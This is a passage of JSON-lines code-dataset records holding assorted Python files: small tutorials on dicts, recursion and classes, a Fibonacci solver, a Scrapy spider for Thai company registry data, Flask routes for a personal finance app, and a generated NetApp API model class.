__init__( self, *args, **kwargs ):\n\t\tcollections.OrderedDict.__init__( self )\n\t\tself.update( *args, **kwargs )\n\t\n\tdef __setitem__( self, key, value ):\n\t\t\"\"\"\n\t\tSet item ; item always go to the end of the dict\n\t\t\"\"\"\n\t\tif( self.has_key( key ) ):\n\t\t\tdel self[ key ]\n\t\tcollections.OrderedDict.__setitem__( self, key, value )\n","sub_path":"dev_chaos/base/cache/CacheDict.py","file_name":"CacheDict.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"386599977","text":"import sys\n\ninput = sys.stdin.readline\nmod = int(1e9)+7\n\ndef multiply(matrix1, matrix2): # 행렬 곱셈\n output = []\n for i in range(2):\n output.append([])\n for j in range(2):\n tmp = 0\n for k in range(2):\n tmp += matrix1[i][k] * matrix2[k][j]\n output[i].append(tmp%mod)\n return output\n\ndef power(matrix, n): # 거듭제곱 분할정복\n if n == 1: return matrix\n tmp = power(matrix, n//2)\n if n%2 == 0:\n return multiply(tmp, tmp)\n else:\n return multiply(multiply(tmp, tmp), matrix)\n\nN = int(input().rstrip())\nmatrix = [[1, 1], [1, 0]] # 피보나치 행렬 거듭제곱 일반항\nprint(power(matrix, N)[0][1])\n\n\"\"\"\n피보나치 일반항을, 행렬의 거듭제곱으로 변환할 줄 알아야 하고\n행렬의 거듭제곱을 할 줄 알아야 하고\n거듭제곱을 분할정복으로 할 줄 알아야 풀 수 있는 문제이다\n2022-10-08기준, 가장 빠른 속도로 피보나치를 구할 수 있는 코드이다\n\n<참고한 링크>\n참고한 코드 원문\nhttps://ca.ramel.be/50\n\n백준 피보나치 블로그글\nhttps://www.acmicpc.net/blog/view/28\n\n피보나치가 [1, 1],[1, 0]의 거듭제곱이 되는 과정\nhttps://www.youtube.com/watch?v=uX2IsIykLJc\n\"\"\"\n\n# https://www.acmicpc.net/problem/11444","sub_path":"알고리즘/[템플릿]/분할정복/피보나치 수 6.py","file_name":"피보나치 수 6.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"343303338","text":"########## 辞書型(dict)に関してのまとめ ##########\n\n################ practice 4-1 ################\n#辞書型はindexナンバーではなく任意のキー文字列で内容を操作する。\n#辞書型のデータ作成例\n#変数 = {'キー1':値1, 'キー2':値2, 'キー3':値3}\n\n#実際に作成してみる\nages = {'中村': 28, '木原': 19, '佐々木': 21, '柴田': 18}\nprint(ages) #print OK!\n\n#辞書型から値を取り出す\nprint(\"木原の年齢は{0}歳です\".format(ages['木原']))\n\n#辞書型のないようを更新する\nages['柴田'] = 19\nprint(ages)\n\nprint(\"\\n\")\n\n#辞書型にもin 句を用いることが可能\nprices = {'リンゴ': 100, 'バナナ': 90, 'オレンジ': 120}\n#リンゴはある?\nprint(\"リンゴはある?\")\nif 'リンゴ' in prices:\n print(\"あります。\")\nelse:\n print(\"ありません。\")\nprint(\"{0}円です。\".format(prices['リンゴ']))\n\n#オレンジはある?\nprint(\"パイナポーはある?\")\nif 'パイナポー' in prices:\n print(\"あります。\")\nelse:\n print(\"ありません。\")\n# print(\"{0}円です。\".format(prices['パイナポー']))\nprint(\"\\n\")\n\n#辞書型のキーが思い出せなくても大丈夫!keys()で列挙することができる。\nprint(\"prisesのキーは、{0}だよ。\".format(prices.keys()))\n\nprint(\"listを使うと{0}と表示される\".format(list(prices.keys())))\nprint(\"sortedを使うと{0}と並び替えて表示される\".format(sorted(prices.keys()))) #実は文字コード順に並び替えている。\nprint(\"\\n\")\n\n#辞書型(dict)の値を列挙する小技まとめ\n# list(dict.keys())\n# sorted(dict.keys())\n# dict,values()\n# list(dict.items())\n\n#辞書型とforを組み合わせて使う\nfluits = {\n 'リンゴ': 100,\n 'バナナ': 90,\n 'オレンジ': 120,\n 'メロン': 500,\n 'マンゴー': 410\n}\n\n#辞書型のデータ一覧を表示1 ループで辞書型を表示\nfor name in fluits.keys(): #繰り返し変数 in 個数分\n # 値段を得る\n price = fluits[name]\n #画面に出力\n s = \"{0}の値段は{1}円です。\".format(name, price)\n print(s)\nelse:\n print(\"以上が販売している商品の一覧です。\\n\")\n\n#辞書型のデータ一覧を表示2 items()を利用する\nfor name, price in fluits.items():\n #items()を用いることによって辞書型から変数を2個取って来れる\n s = \"{0}の値段は{1}円です。\".format(name, price)\n print(s)\nelse:\n print(\"こっちの方がスマートでしょう?\\n\")\n\n#for キー, 値 in 辞書型.items():\n# キーと値を利用する\n\n#成績データを辞書型で定義\nrecords = {\n 'Tanaka': 72, 'Yamada': 65, 'Hirata': 100,\n 'Akai': 56, 'Hukuda':66, 'Sakai':80\n}\n\n\n#合計を求める\nsum_v = 0\nfor v in records.values(): #recordsの値だけを順に取得\n sum_v += v\n\n#合計値を要素数で割る\nave_v = sum_v / len(records)\nprint(\"合計点:\", sum_v)\nprint(\"平均点:\", ave_v)\n\n#成績データの一覧と平均点との差を表示\nfmt = \"| {0:<7} | {1:>4} | {2:>5} |\"\n#{0}を7文字左寄せ、{1}を4文字右寄せ、{2}を5文字右寄せにする\n\nprint(fmt.format(\"名前\", \"点数\", \"差\"))\nfor name, v in sorted(records.items()):\n #平均点との��を求める\n diff_v = v - ave_v\n #小数点以下を丸める\n diff_v = round(diff_v, 1) #diff_vの値を小数以下1位に四捨五入\n #設定した書式に沿って出力\n print(fmt.format(name, v, diff_v))\nelse:\n print(\"こんな器用なこともできるんですよ\\n\")\n\n\n#英単語の出現回数を調べる\ntext = \"\"\"\nHe's been watching us since we arrived.\nNo, she helped me with my homework.\nBut my daughter's wedding cost me a fortune.\nIn the morning, I love to have a cup of coffee!\nWhat should we season it with?\n\"\"\"\n# 単語を区切る\n#文字列 = 文字列.replace(\"A\", \"B\") AをBに置き換える\ntext = text.replace(\",\", \"\") #,を削除\ntext = text.replace(\".\", \"\") #.を削除\ntext = text.replace(\"!\", \"\") #!を削除\ntext = text.replace(\"?\", \"\") #?を削除\n#\nwords = text.split() #空白で区切ってリスト型を作成\n\n#単語を数える\ncounter = {} #counterという空白の辞書型を作成\n\nfor w in words:\n ws = w.lower() #小文字に変換\n if ws in counter: #もし辞書型にすでにキーがあれば値を一つ追加\n counter[ws] += 1\n else: #もし辞書型にキーがなければ値を1としてキーを登録\n counter[ws] = 1\n\n#結果を表示\nfor k, v in sorted(counter.items()):\n if v >= 1: #文字列が1つ以上あれば表示する\n print(k, v) #文字と個数を表示","sub_path":"Python/practice4.py","file_name":"practice4.py","file_ext":"py","file_size_in_byte":4653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"353140001","text":"#!/usr/bin/env python\n\nimport advanced_python_regex as apr\nfrom collections import defaultdict\n\nfaculty = apr.read_faculty()\n\n# Q6\n\nfaculty_dict = defaultdict(list)\n\nfor prof in faculty:\n surname = prof['name'].split()[-1]\n faculty_dict[surname].append([prof['degree'], prof['title'], prof['email']])\n\nfor item in list(faculty_dict.items())[:3]:\n print(item)\n\n# Q7\n\nprof_dict = {}\n\nfor prof in faculty:\n names = prof['name'].split()\n fname, surname = names[0], names[-1]\n prof_dict[(fname, surname)] = [prof['degree'], prof['title'], prof['email']]\n\nprint()\n\nfor item in list(prof_dict.items())[:3]:\n print(item)\n\n# Q8\n\nprint()\n\nfor item in sorted(prof_dict.items(), key=lambda t: (t[0][1], t[0][0]))[:3]:\n print(item)\n","sub_path":"python/advanced_python_dict.py","file_name":"advanced_python_dict.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"231585120","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\ndef findMaximum(elements,i=0,maximum=None):\n\t# Cas de base\n\tif(i >= len(elements)): return maximum\n\t# Cas général, initialement, maximum = elements[0]\n\t# Sinon maximum = max(maximum,elements[i])\n\tif(i<1): maximum = elements[0]\n\telif(elements[i]>maximum): maximum = elements[i]\n\t# Appel récursif sur la suite de la liste\n\treturn findMaximum(elements,i+1,maximum)\n\nprint(findMaximum([3,4,5,2,3,6]))\n","sub_path":"Algorithmique/Récursivité/FindMaximum.py","file_name":"FindMaximum.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"468216468","text":"import os, time, re, pickle, signal\nimport pytesseract\nfrom PIL import Image\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium import webdriver\nimport scrapy\nimport json\nfrom postscrape.items import PostscrapeItem\n\nclass DBDSpider(scrapy.Spider):\n name = \"dbd_thai\"\n # start_urls = ['https://datawarehouse.dbd.go.th/company/profile/5/0105554123553']\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'\n }\n allowed_domains = [\"datawarehouse.dbd.go.th\"]\n\n def start_requests(self):\n urls = [\n \"https://datawarehouse.dbd.go.th/company/profile/5/0105554123553\"\n ]\n for url in urls:\n # yield scrapy.Request(url=url, cookies={\"JSESSIONID\":'OTk2YjM4MWYtNTQwMi00YmUwLTk2ZjItMzYxM2M4YjAzNDAw'}, callback=self.parse)\n yield scrapy.Request(url=url, cookies={\"JSESSIONID\":self.getCookie}, callback=self.parse)\n\n def getCookie(self):\n cookie_path = '/Users/mya/Desktop/Development/scrapyTest/postscrape/postscrape/spiders/temp/cookie.json'\n if os.path.isfile(cookie_path):\n try:\n with open(cookie_path, 'rb') as f: \n cookies = pickle.load(f)\n except EOFError:\n cookies = None\n\n for i in cookies:\n if i['name']=='JSESSIONID':\n cookies= i['value']\n break\n print(cookies)\n return cookies\n\n def writeJsonFile(self, data):\n filePath = '/Users/mya/Desktop/Development/scrapyTest/postscrape/postscrape/spiders/temp/thaiVersion.json'\n a_file = open(filePath, \"w\", encoding='utf-8')\n line = json.dumps(data, ensure_ascii=False) + \"\\n\"\n a_file.write(line)\n\n def readLoadsFile(self):\n loadsfilePath = '/Users/mya/Desktop/Development/scrapyTest/postscrape/postscrape/spiders/temp/thaiVersion.json'\n print('------------Target Company Information------------')\n loadsdata = json.load(open(loadsfilePath))\n print(loadsdata)\n return loadsdata\n\n def parse(self, response):\n print('------------START SCRAPING------------')\n time.sleep(5)\n objective = response.xpath('/html/body/div[1]/div[4]/div[2]/div[1]/div[2]/div[2]/div[1]/div[3]/div[5]/div/p/text()').get()\n if objective == '-':\n objective = response.xpath('/html/body/div[1]/div[4]/div[2]/div[1]/div[2]/div[2]/div[1]/div[3]/div[3]/div/p/text()').get()\n\n director_list = []\n directors = response.xpath('/html/body/div[1]/div[4]/div[2]/div[1]/div[2]/div[2]/div[1]/div[2]/div/div/ol/li/text()').getall()\n for i in directors:\n director_list.append(i.strip())\n\n raw_bussiness_type = response.xpath('/html/body/div[1]/div[4]/div[2]/div[1]/div[2]/div[2]/div[1]/div[3]/div[4]/div/p/text()').get()\n try:\n raw_bussiness_type = raw_bussiness_type.strip()\n except:\n raw_bussiness_type = 'ERRRRRRRRRRRRRRRRRRRORRRRRRRRRRRRRRRRRRRRRR:' + response.url.split('/')[-1]\n\n if raw_bussiness_type == '-':\n raw_bussiness_type = response.xpath('/html/body/div/div[4]/div[2]/div[1]/div[2]/div[2]/div[1]/div[3]/div[2]/div/p/text()').get().strip()\n \n tel = response.xpath('/html/body/div[1]/div[4]/div[2]/div[1]/div[2]/div[2]/div[1]/div[1]/div[2]/table/tbody/tr[3]/td[2]/text()').get()\n if tel == None:\n tel = 'No Data'\n\n fax = response.xpath('/html/body/div[1]/div[4]/div[2]/div[1]/div[2]/div[2]/div[1]/div[1]/div[2]/table/tbody/tr[4]/td[2]/text()').get()\n if fax == None:\n fax = 'No Data'\n\n website = response.xpath('/html/body/div[1]/div[4]/div[2]/div[1]/div[2]/div[2]/div[1]/div[1]/div[2]/table/tbody/tr[5]/td[2]/text()').get()\n if website == None:\n website = 'No Data'\n\n email = response.xpath('/html/body/div[1]/div[4]/div[2]/div[1]/div[2]/div[2]/div[1]/div[1]/div[2]/table/tbody/tr[6]/td[2]/text()').get()\n if email == None:\n email = 'No Data'\n\n item = []\n # item['companies'] = []\n item.append({\n 'company_name': response.xpath('/html/body/div/div[4]/div[2]/div[1]/div[1]/h2/text()').get(),\n 'company_id': '0105554123553',\n 'company_type': response.xpath('/html/body/div[1]/div[4]/div[2]/div[1]/div[2]/div[2]/div[1]/div[1]/div[1]/table/tr[1]/th[2]/text()').get(),\n 'status': response.xpath('/html/body/div[1]/div[4]/div[2]/div[1]/div[2]/div[2]/div[1]/div[1]/div[1]/table/tr[3]/td[2]/text()').get(),\n 'address': response.xpath('/html/body/div[1]/div[4]/div[2]/div[1]/div[2]/div[2]/div[1]/div[1]/div[2]/table/tr[2]/td/text()').get(),\n 'objective': objective,\n 'directors': director_list,\n 'bussiness_type': raw_bussiness_type,\n 'tel': tel,\n 'fax': fax,\n 'website': website,\n 'email': email,\n })\n\n # item['company_name'] = response.xpath('/html/body/div/div[4]/div[2]/div[1]/div[1]/h2/text()').get()\n # item['company_id'] = '0105554123553'\n # item['company_type'] = response.xpath('/html/body/div[1]/div[4]/div[2]/div[1]/div[2]/div[2]/div[1]/div[1]/div[1]/table/tr[1]/th[2]/text()').get()\n # item['status'] = response.xpath('/html/body/div[1]/div[4]/div[2]/div[1]/div[2]/div[2]/div[1]/div[1]/div[1]/table/tr[3]/td[2]/text()').get()\n # item['address'] = response.xpath('/html/body/div[1]/div[4]/div[2]/div[1]/div[2]/div[2]/div[1]/div[1]/div[2]/table/tr[2]/td/text()').get()\n # item['objective'] = objective\n # item['directors'] = director_list\n # item['bussiness_type'] = raw_bussiness_type\n\n self.writeJsonFile(item)\n item = self.readLoadsFile()\n \n return item","sub_path":"postscrape/postscrape/spiders/spider_Thai.py","file_name":"spider_Thai.py","file_ext":"py","file_size_in_byte":5949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"15911517","text":"\"\"\"\n————面对对象编程————\n类class——创建一个类class\n 如:class person:\n 主体\n\n对象object——类的一个实例,或者说类的一次调用:如 p=person()\n\n类的属性——类的实体可以是数据(变量)、功能(函数),区别于普通变量和函数,称为字段、方法\n\n字段Field——即从属与类或者对象的变量,从属于类本身的:类变量,���属于类的一个独立的实例或对象:对象变量\n 类变量——共享的,可以被类的所有实例访问并修改,且修改对所有有效\n 对象变量——不共享,每个类的独立对象拥有属于自己的变量副本\n\n方法Method——即从属于类的函数,与普通函数的区别是必须多加一个参数self到参数列表开头\n\n__init__()——一种特殊方法,不同于其他方法的地方是:这种方法在类被实例化(创建一个对象)时就立即自动运行,而不必具体调用\n\n\"\"\"\nclass Robot:\n population = 0 #类变量,共享——用于对机器人当前数量计数\n\n def __init__(self,name): #机器人初始化\n self.name = name #name是属于对象(由self生成)的对象变量,不共享,只属于该对象\n print(\"Initializing {}\".format(self.name))\n Robot.population += 1\n\n def die(self): #销毁机器人\n print(\"{} is being destroyed\".format(self.name))\n Robot.population -= 1\n if Robot.population == 0:\n print(\"{} was the last one.\".format(self.name))\n else:\n print(\"There are still {:d} robots working.\".format(Robot.population))\n\n def say_hello(self): #机器人打招呼\n print(\"hello,my master call me {}\".format(self.name))\n\n @classmethod #classmethod装饰器将下面方法直接标记为类方法,便于识别,不用回头看和类的关系\n def how_many(cls):\n print(\"we have {:d} robots.\".format(cls.population))\n\n\np1 = Robot(\"R2-D2\") #调用一次类Robot后,创建一个针对参数R2-D2的实例——即对象\np1.say_hello() #因R2-D2是对象变量,不共享,所以使用到R2-D2时,使用对象p1来调用\nRobot.how_many() #population是类变量,共享,使用使用到population时直接用类来调用\nprint()\np2 = Robot(\"C-3PO\") #再次调用类Robot,再创建一个针对参数C-3PO的实例——即对象\np2.say_hello()\nRobot.how_many()\nprint()\np1.die() #die方法也用到对象变量R2-D2,不共享,使用对应的对象p1来调用\np2.die()\nRobot.how_many()\n","sub_path":"Object/class.py","file_name":"class.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"254843608","text":"from app import db\nfrom app.forms import AddTransactionForm, AddRuleForm, TransactionRulesMapperForm, EditRuleForm\nfrom app.models import User, Account, Transaction, load_user, TransactionType, Rule, RuleEffect\nfrom flask import render_template, request, flash, redirect, url_for\nfrom flask_login import current_user, login_required\nfrom app.main import bp\nimport csv\nfrom io import StringIO\nfrom datetime import datetime\nfrom decimal import Decimal\nimport fnmatch\nfrom collections import OrderedDict\nfrom sqlalchemy import func\n\n@bp.route('/')\ndef home():\n return render_template('home.html', title=\"Home\")\n\n\n@bp.route('/index')\n@login_required\ndef index():\n user = load_user(current_user.id)\n\n account_info = {}\n\n return render_template('index.html', title=\"Home\", account_info=account_info)\n\n\n@bp.route('/transactions', methods=['GET', 'POST'])\n@login_required\ndef transactions():\n user = load_user(current_user.id)\n\n form = AddTransactionForm()\n\n if form.validate_on_submit():\n transaction = Transaction(user_id=user.id, description=form.description.data, amount=form.amount.data)\n\n if form.credit.data:\n transaction.type = TransactionType.CREDIT.value\n else:\n transaction.type = TransactionType.DEBIT.value\n\n db.session.add(transaction)\n db.session.commit()\n\n return render_template('transactions.html', user=user, form=form)\n\n\n@bp.route('/categoryreport', methods=['GET', 'POST'])\n@login_required\ndef category_report():\n user = load_user(current_user.id)\n\n transactions = \\\n Transaction.query.filter(User.id == user.id, Transaction.transaction_date > '2018-01-01',\n Transaction.transaction_date < '2018-12-01').order_by(Transaction.rule_id).all()\n rules = Rule.query.filter(User.id == user.id).all()\n\n rules_dict = {rule.id: rule for rule in rules}\n # print(rules_dict)\n category_mappings = {}\n category_subcategory_mappings = {}\n for transaction in transactions:\n if transaction.rule_id is not None:\n rule = rules_dict[transaction.rule_id]\n if rule.effect != RuleEffect.EXCLUDE.value:\n try:\n current_total = category_mappings[rule.category]\n except KeyError:\n current_total = Decimal(0)\n category_mappings[rule.category] = current_total + transaction.amount\n\n key = rule.category + \"-\" + rule.sub_category\n try:\n current_total = category_subcategory_mappings[key]\n except KeyError:\n current_total = Decimal(0)\n if transaction.type == TransactionType.CREDIT.value:\n category_subcategory_mappings[key] = current_total + transaction.amount\n else:\n category_subcategory_mappings[key] = current_total - transaction.amount\n else:\n try:\n current_total = category_mappings[\"Unmapped\"]\n except KeyError:\n current_total = Decimal(0)\n category_mappings[\"Unmapped\"] = current_total + transaction.amount\n\n try:\n current_total = category_subcategory_mappings[\"Unmapped\"]\n except KeyError:\n current_total = Decimal(0)\n if transaction.type == TransactionType.CREDIT.value:\n category_subcategory_mappings[\"Unmapped\"] = current_total + transaction.amount\n else:\n category_subcategory_mappings[\"Unmapped\"] = current_total - transaction.amount\n\n\n # print(\"--\")\n # print(category_mappings)\n # print(\"--\")\n # print(sorted(category_subcategory_mappings))\n\n # category_subcategory_list = []\n # for key, value in sorted(collections.OrderedDict(category_subcategory_mappings.items())):\n # category_subcategory_mappings.append({\"category-subcategory\": key, \"total\": value})\n\n return render_template('categoryreport.html',\n report=OrderedDict(sorted(category_subcategory_mappings.items(), key=lambda t: t[0])))\n\n\n@bp.route('/transactionsrulesmapper', methods=['GET', 'POST'])\n@login_required\ndef transactions_rules_mapper():\n user = load_user(current_user.id)\n\n grouped_transactions = \\\n db.session.query(Transaction.description, func.count('*'), func.sum(Transaction.amount).label('total')) \\\n .filter_by(user_id=user.id, rule_id=None) \\\n .group_by(Transaction.description)\\\n .order_by(func.sum(Transaction.amount).desc()).all()\n\n print(grouped_transactions)\n\n form = TransactionRulesMapperForm()\n\n if form.validate_on_submit():\n rule = Rule(user=user, match_string=form.match_string.data,\n category=form.category.data, sub_category=form.sub_category.data)\n\n db.session.add(rule)\n db.session.commit()\n\n unmatched_transactions = \\\n Transaction.query.filter_by(user_id=user.id, rule_id=None).order_by(Transaction.description).all()\n\n for transaction in unmatched_transactions:\n if fnmatch.fnmatch(transaction.description, rule.match_string):\n transaction.rule_id = rule.id\n\n db.session.commit()\n\n unmatched_transactions = \\\n Transaction.query.filter_by(user_id=user.id, rule_id=None).order_by(Transaction.description).all()\n\n return render_template('transactions_rules_mapper.html', transactions=grouped_transactions, form=form)\n\n\n@bp.route('/rules', methods=['GET', 'POST'])\n@login_required\ndef rules():\n\n user = load_user(current_user.id)\n form = AddRuleForm()\n\n if form.validate_on_submit():\n rule = Rule(user=user, match_string=form.match_string.data,\n category=form.category.data, sub_category=form.sub_category.data)\n\n db.session.add(rule)\n db.session.commit()\n\n for transaction in user.transactions:\n if fnmatch.fnmatch(transaction.description, rule.match_string):\n transaction.rule_id = rule.id\n\n db.session.commit()\n\n # rules = db.session.query(Transaction.rule_id, func.count('*').label('rule_count'))\\\n # .group_by(Transaction.rule_id).join(Rule.transactions).all()\n\n return render_template('rules.html', rules=user.rules, form=form)\n\n\n@bp.route('/edit_rule/', methods=['GET', 'POST'])\n@login_required\ndef edit_rule(rule_id):\n\n user = load_user(current_user.id)\n rule = Rule.query.get(int(rule_id))\n\n form = EditRuleForm()\n\n if form.validate_on_submit():\n rule.match_string = form.match_string.data\n rule.sub_category = form.sub_category.data\n rule.category = form.category.data\n\n db.session.add(rule)\n\n # Remove mapping for existing rule, then apply match again over all transactions\n for transaction in rule.transactions:\n rule.transactions.remove(transaction)\n\n for transaction in user.transactions:\n if fnmatch.fnmatch(transaction.description, rule.match_string):\n transaction.rule_id = rule.id\n\n db.session.commit()\n\n flash('Rule details have been updated.')\n\n elif request.method == 'GET':\n form.match_string.data = rule.match_string\n form.category.data = rule.category\n form.sub_category.data = rule.sub_category\n\n return render_template('edit_rule.html', rule=rule, form=form)\n\n\n@bp.route('/delete_rule/')\n@login_required\ndef delete_rule(rule_id):\n\n rule = Rule.query.get(int(rule_id))\n\n db.session.delete(rule)\n db.session.commit()\n\n flash('Rule deleted.')\n\n return redirect(url_for('main.rules'))\n\n\ndef utf_8_encoder(unicode_csv_data):\n for line in unicode_csv_data:\n yield line.encode('utf-8')\n\n\ndef transaction_exists(transaction, existing_transactions):\n for existing_transaction in existing_transactions:\n if (existing_transaction.transaction_date ==\n datetime.strptime(transaction.transaction_date, \"%d-%b-%y\") and\n existing_transaction.description == transaction.description and\n Decimal(existing_transaction.amount) == Decimal(transaction.amount)):\n return True;\n return False;\n\n\n@bp.route('/upload', methods=['GET', 'POST'])\n@login_required\ndef upload():\n if request.method == 'POST':\n # check if the post request has the file part\n if 'file' not in request.files:\n flash('No file part')\n return redirect(request.url)\n file = request.files['file']\n # if user does not select file, browser also\n # submit an empty part without filename\n if file.filename == '':\n flash('No selected file')\n return redirect(request.url)\n if file:\n # with open(file.read(), 'r') as f:\n # content = [row for row in csv.reader(f.read().splitlines(), delimiter=',')]\n content = file.read()\n content = content.decode('utf-8')\n content = content.replace(\"\\r\", \"\\n\")\n csv_reader = csv.reader(StringIO(content), delimiter=',', dialect=csv.excel)\n\n user = load_user(current_user.id)\n\n next(csv_reader, None)\n\n # Need to keep additional list so that we don't discard same transactions in the\n # same upload. e.g. multiple buys at same place on same day for same amount\n new_transactions = []\n\n for row in csv_reader:\n\n transaction_date = row[0]\n description = row[1]\n credit = row[7]\n debit = row[6]\n\n transaction = Transaction(user_id=user.id, transaction_date=transaction_date, description=description)\n if credit:\n transaction.type = TransactionType.CREDIT.value\n transaction.amount = credit\n else:\n transaction.type = TransactionType.DEBIT.value\n transaction.amount = debit\n\n if not transaction_exists(transaction, user.transactions):\n new_transactions.append(transaction)\n else:\n print(\"Transaction already exists:\" + str(transaction.amount))\n\n db.session.add_all(new_transactions)\n db.session.commit()\n\n return render_template('upload_transactions.html')\n\n","sub_path":"app/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":10418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"54690330","text":"# coding: utf-8\n\n\"\"\"\nPITConsistencyGroupViewCreationDescriptor.py\n\n The Clear BSD License\n\n Copyright (c) – 2016, NetApp, Inc. All rights reserved.\n\n Redistribution and use in source and binary forms, with or without modification, are permitted (subject to the limitations in the disclaimer below) provided that the following conditions are met:\n\n * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.\n\n * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.\n\n * Neither the name of NetApp, Inc. nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.\n\n NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\nfrom pprint import pformat\nfrom six import iteritems\n\n\nclass PITConsistencyGroupViewCreationDescriptor(object):\n \"\"\"\n NOTE: This class is auto generated by the swagger code generator program.\n Do not edit the class manually.\n \"\"\"\n def __init__(self):\n \"\"\"\n PITConsistencyGroupViewCreationDescriptor - a model defined in Swagger\n\n :param dict swaggerTypes: The key is attribute name\n and the value is attribute type.\n :param dict attributeMap: The key is attribute name\n and the value is json key in definition.\n \"\"\"\n self.swagger_types = {\n 'cg_ref': 'str', # (required parameter)\n 'pit_sequence_number': 'int', # (required parameter)\n 'view_creation_descriptor': 'list[PITViewCreationDescriptor]', # (required parameter)\n 'label': 'str'\n }\n\n self.attribute_map = {\n 'cg_ref': 'cgRef', # (required parameter)\n 'pit_sequence_number': 'pitSequenceNumber', # (required parameter)\n 'view_creation_descriptor': 'viewCreationDescriptor', # (required parameter)\n 'label': 'label'\n }\n\n self._cg_ref = None\n self._pit_sequence_number = None\n self._view_creation_descriptor = None\n self._label = None\n\n @property\n def cg_ref(self):\n \"\"\"\n Gets the cg_ref of this PITConsistencyGroupViewCreationDescriptor.\n The Consistency Group on which views are to be created. All PiTs referenced in the view creation descriptors must be part of this consistency group.\n\n :return: The cg_ref of this PITConsistencyGroupViewCreationDescriptor.\n :rtype: str\n :required/optional: required\n \"\"\"\n return self._cg_ref\n\n @cg_ref.setter\n def cg_ref(self, cg_ref):\n \"\"\"\n Sets the cg_ref of this PITConsistencyGroupViewCreationDescriptor.\n The Consistency Group on which views are to be created. All PiTs referenced in the view creation descriptors must be part of this consistency group.\n\n :param cg_ref: The cg_ref of this PITConsistencyGroupViewCreationDescriptor.\n :type: str\n \"\"\"\n self._cg_ref = cg_ref\n\n @property\n def pit_sequence_number(self):\n \"\"\"\n Gets the pit_sequence_number of this PITConsistencyGroupViewCreationDescriptor.\n The sequence number of PiTs for which views are to be created. PITRefs in the view creation descriptors provided must have this sequence number (this is just for cross-checking the list of PiTs).\n\n :return: The pit_sequence_number of this PITConsistencyGroupViewCreationDescriptor.\n :rtype: int\n :required/optional: required\n \"\"\"\n return self._pit_sequence_number\n\n @pit_sequence_number.setter\n def pit_sequence_number(self, pit_sequence_number):\n \"\"\"\n Sets the pit_sequence_number of this PITConsistencyGroupViewCreationDescriptor.\n The sequence number of PiTs for which views are to be created. PITRefs in the view creation descriptors provided must have this sequence number (this is just for cross-checking the list of PiTs).\n\n :param pit_sequence_number: The pit_sequence_number of this PITConsistencyGroupViewCreationDescriptor.\n :type: int\n \"\"\"\n self._pit_sequence_number = pit_sequence_number\n\n @property\n def view_creation_descriptor(self):\n \"\"\"\n Gets the view_creation_descriptor of this PITConsistencyGroupViewCreationDescriptor.\n A list of creation descriptors for the views to be created.\n\n :return: The view_creation_descriptor of this PITConsistencyGroupViewCreationDescriptor.\n :rtype: list[PITViewCreationDescriptor]\n :required/optional: required\n \"\"\"\n return self._view_creation_descriptor\n\n @view_creation_descriptor.setter\n def view_creation_descriptor(self, view_creation_descriptor):\n \"\"\"\n Sets the view_creation_descriptor of this PITConsistencyGroupViewCreationDescriptor.\n A list of creation descriptors for the views to be created.\n\n :param view_creation_descriptor: The view_creation_descriptor of this PITConsistencyGroupViewCreationDescriptor.\n :type: list[PITViewCreationDescriptor]\n \"\"\"\n self._view_creation_descriptor = view_creation_descriptor\n\n @property\n def label(self):\n \"\"\"\n Gets the label of this PITConsistencyGroupViewCreationDescriptor.\n The name of the new Consistency Group View.\n\n :return: The label of this PITConsistencyGroupViewCreationDescriptor.\n :rtype: str\n :required/optional: required\n \"\"\"\n return self._label\n\n @label.setter\n def label(self, label):\n \"\"\"\n Sets the label of this PITConsistencyGroupViewCreationDescriptor.\n The name of the new Consistency Group View.\n\n :param label: The label of this PITConsistencyGroupViewCreationDescriptor.\n :type: str\n \"\"\"\n self._label = label\n\n def to_dict(self):\n \"\"\"\n Returns the model properties as a dict\n \"\"\"\n result = {}\n\n for attr, _ in 